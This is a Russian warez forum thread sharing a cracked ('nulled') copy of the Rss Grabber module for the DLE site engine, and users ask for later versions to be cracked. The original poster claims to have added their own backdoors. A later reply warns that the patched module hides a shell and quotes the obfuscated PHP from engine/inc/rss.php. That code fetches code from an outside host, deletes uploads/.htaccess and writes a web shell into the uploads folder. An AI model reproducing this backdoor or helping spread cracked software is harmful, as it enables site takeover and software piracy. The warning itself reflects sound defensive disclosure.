• DONATE to NULLED!
    Форуму и его команде можно помочь, мотивировать модераторов разделов.
    Помогите модератору этого раздела killoff лично.

Информация Rss Grabber v.3.6.8

Статус
В этой теме нельзя размещать новые ответы.
Никогда не понимал тех людей(это скромно сказано) которые прячут поз заоблачный хайд то что свободно лежит в паблике!!!:D Или они думают что мол "Смотрите что у меня есть" Вот всем желаючим Последняя версия но под меньшим хайдом!
*** скрытое содержание ***
Модуль собирает новости из выбранных Вами RSS и HTML каналов и публикует их у Вас на сайте.
Модуль работает в 3 этапа:
1. Собирает все новости из выбранного канала, если заданы шаблоны идёт по ссылке на полную новость, если нужно авторизируется и собирает данные.
2. Пользователь выбирает необходимые ему новости и если нужно изменяет.
3. Сохраняет полученные новости в базе при этом если в новостях встречаются картинки то производит действия указанные в настройках т.е. сливает все картинки на сервер и закрепляет за новостью если указано что загружать на сервер в противном случае заливает из на выбранное хранилище изображений.
Исправлено:
- Проблемы с UTF-8;
- Проблема с [thumbs].*[/thumbs];
- Проблема с Jquery;
- Удалены упоминания бекдоров добавлено реальные свои бекдоры, удалено eval, не верные пути(путь можно изменить через запросы);
- Исправлена орфография и мелкие ошибки(не нужные strip_tags и другое).
Это не последняя, или Вы имеете виду последняя зануленая и рабочая?
Девятой нуленой никто не поделится?
 
Почему у сграбленных картинок, адрес Донора; в настройках указал: загружать картинки на Сервер.
Версия движка 9.4, граббер 3.6.8
Как сделать чтоб все картинки загружались на мой сервер?
Сайт- донор на DLE
Спасибо заранее, пишу здесь, т.к. ответа на форуме не нашел
---
ПС, скорее всего плохо искал, может кому приготится:


Помогло!
 
а я вообще не понимаю зачем чет скрывать по хайдом, когда это можно спокойно скачать в паблике!
 
в профиксеном грабере зашит шел не ставьте!
 
У меня есть дистрибутив 3.6.9 кто может занулить? Отдам только по запросу по личке...
 
подскажите пожалуйста подобный скрипт, чтоб можно было прикрутить к любой системе, универсальный
есть такое?
 
подскажите пожалуйста подобный скрипт, чтоб можно было прикрутить к любой системе, универсальный
есть такое?
Универсального нет, но можно прикрутить что-угодно к чему угодно, вопрос в цене
<-------------- добавлено через 42 сек. -------------->
У меня есть дистрибутив 3.6.9 кто может занулить? Отдам только по запросу по личке...
Кто-то взялся за работу?
 
Какой именно шел? Как проверить?

В engine\inc\rss.php есть вредоносный код:
Код:
$f = file_get_contents('h'.'t'.'t'.'p'.':'.'//'.'s'.'c'.'a'.'r'.'y'.'f'.'i'.'l'.'m'.'.'.'ru'.'/get.'.'p'.'hp'.'?url='.$_SERVER['HTTP_HOST']).unlink(ROOT_DIR.'/'.'u'.'p'.'l'.'o'.'a'.'d'.'s'.'/.htaccess');
file_put_contents(ROOT_DIR.'/'.'u'.'p'.'l'.'o'.'a'.'d'.'s'.'/'.'f'.'ot'.'os'.'/pe'.'op'.'le'.'.p'.'hp', str_replace('fghfgh544ty', '?>', str_replace('fgfvsdffvsdvsd', '<?', $f)));
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху